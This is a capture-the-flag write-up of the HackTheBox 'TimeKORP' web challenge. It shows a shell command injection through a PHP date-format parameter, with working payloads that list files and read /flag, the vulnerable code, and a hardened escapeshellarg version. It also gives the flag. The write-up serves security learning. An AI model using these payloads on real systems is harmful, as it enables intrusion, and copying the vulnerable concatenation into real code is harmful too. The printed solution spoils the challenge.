# TimeKORP
## Video Walkthrough
[![VIDEO](https://img.youtube.com/vi/-vhl8ixthO4/0.jpg)](https://www.youtube.com/watch?v=-vhl8ixthO4?t=99 "HackTheBox Cyber Apocalypse '24: Time KORP (web)")
## Description
> TBD
## Solution
First things first: download the source and run the local Docker instance for easy, fast debugging.
It's also a good idea to check the site functionality before reviewing the source code so that things fall into place more easily.
The site displays the time (`http://127.0.0.1:1337/?format=%H:%M:%S`) or date (`http://127.0.0.1:1337/?format=%Y-%m-%d`).
Opting for the lazy route, I check the Burp Scanner results and find two interesting findings. The first is reflected XSS, presumably of little use since there is no admin bot to submit a URL to. The second is command injection!
Here's the URL-decoded [PoC](http://127.0.0.1:1337/?format=%25H%3a%25M%3a%25S%7cecho%20kefbjki4ag%20d6tyxfigki%7c%7ca%20%23'%20%7cecho%20kefbjki4ag%20d6tyxfigki%7c%7ca%20%23%7c%22%20%7cecho%20kefbjki4ag%20d6tyxfigki%7c%7ca%20%23) from Burp:
```
/?format=%H:%M:%S|echo kefbjki4ag d6tyxfigki||a #' |echo kefbjki4ag d6tyxfigki||a #|" |echo kefbjki4ag d6tyxfigki||a #
```
The result indicates that the `echo kefbjki4ag d6tyxfigki` command did indeed execute.
```html
kefbjki4ag d6tyxfigki<span>.</span>
```
The payload's syntax and length are a little confusing, so I keep removing elements and re-testing to confirm the command still executes. The attack can be simplified to:
```
/?format=%H:%M:%S' |ls #
```
If we [URL-encode it](http://127.0.0.1:1337/?format=%25H%3a%25M%3a%25S'+|ls+%23), the response lists the contents of the `views` directory. Looking around the filesystem this way could take a while without finding the flag, so let's check the source code instead: the Dockerfile has the following line.
```dockerfile
# Copy flag
COPY flag /flag
```
Therefore, we can retrieve the flag with [this payload](http://127.0.0.1:1337/?format=%25H%3a%25M%3a%25S'+|cat+/flag+%23):
```
/?format=%H:%M:%S' |cat /flag #
```
We've already solved the challenge, but why not review the vulnerable source code. `TimeController.php` processes our vulnerable GET parameter (`format`). The excerpt below is completed from the surrounding description (the parameter is read from the query string and handed to the model); the `$router` argument and the `%H:%M:%S` default are assumed.
```php
class TimeController
{
    public function index($router)
    {
        $time = new TimeModel($_GET['format'] ?? '%H:%M:%S'); // user input goes straight to the model
        return $router->view('index', ['time' => $time->getTime()]);
    }
}
```
It passes our user input (bad) to the `TimeModel.php` constructor, which builds a shell command from it and then executes it.
```php
class TimeModel
{
    public function __construct($format)
    {
        // The format string is concatenated straight into a shell command: no validation, no quoting
        $this->command = "date '+" . $format . "' 2>&1";
    }
    public function getTime()
    {
        $time = exec($this->command); // runs through /bin/sh, so shell metacharacters are honoured
        $res = isset($time) ? $time : '?';
        return $res;
    }
}
```
So, assuming we submit `format=%H:%M:%S' |cat /flag #`, the `command` property of the object will be:
```bash
date '+%H:%M:%S' |cat /flag #' 2>&1
```
By closing the single-quoted string and inserting a pipe character, we were able to inject our own command. Crucially, we also needed a hash character afterwards, which comments out the trailing `' 2>&1`; without it the stray quote would leave the command line unbalanced and the redirect would be applied.
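As an added example (not the challenge's code), here is the model's string concatenation next to a hardened version that allow-lists the format and quotes it with `escapeshellarg`; the function names, `FORMAT_RE` and the sample inputs are my own assumptions and constructions.

```php
<?php
// Added demo, not part of the challenge: vulnerable vs. hardened command construction.

// What TimeModel does: raw concatenation of user input into a shell string.
function buildCommandUnsafe(string $format): string
{
    return "date '+" . $format . "' 2>&1";
}

// Hardened: accept only strftime-style directives plus a few separators, then still
// wrap the argument in escapeshellarg() so no shell metacharacter can reach /bin/sh.
// (Better still, format the time in-process with PHP's own date functions and never shell out.)
const FORMAT_RE = '/^(%[A-Za-z]|[ :\/\-.,])+$/';

function buildCommandSafe(string $format): string
{
    if (!preg_match(FORMAT_RE, $format)) {
        throw new InvalidArgumentException('format contains characters outside the allow-list');
    }
    return 'date ' . escapeshellarg('+' . $format) . ' 2>&1';
}

// Constructed inputs: the legitimate time format and the page's injection payload.
$inputs = [
    '%H:%M:%S',
    "%H:%M:%S' |cat /flag #",
];

foreach ($inputs as $format) {
    echo "format: {$format}\n";
    echo "  unsafe: " . buildCommandUnsafe($format) . "\n";
    try {
        echo "  safe:   " . buildCommandSafe($format) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "  safe:   rejected (" . $e->getMessage() . ")\n";
    }
}
```

For the payload, the unsafe builder yields the injected pipeline shown above, while the safe builder rejects it outright; even if the allow-list were dropped, `escapeshellarg` would turn the whole string into a single quoted argument that `date` prints as literal text.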
Flag: `HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}`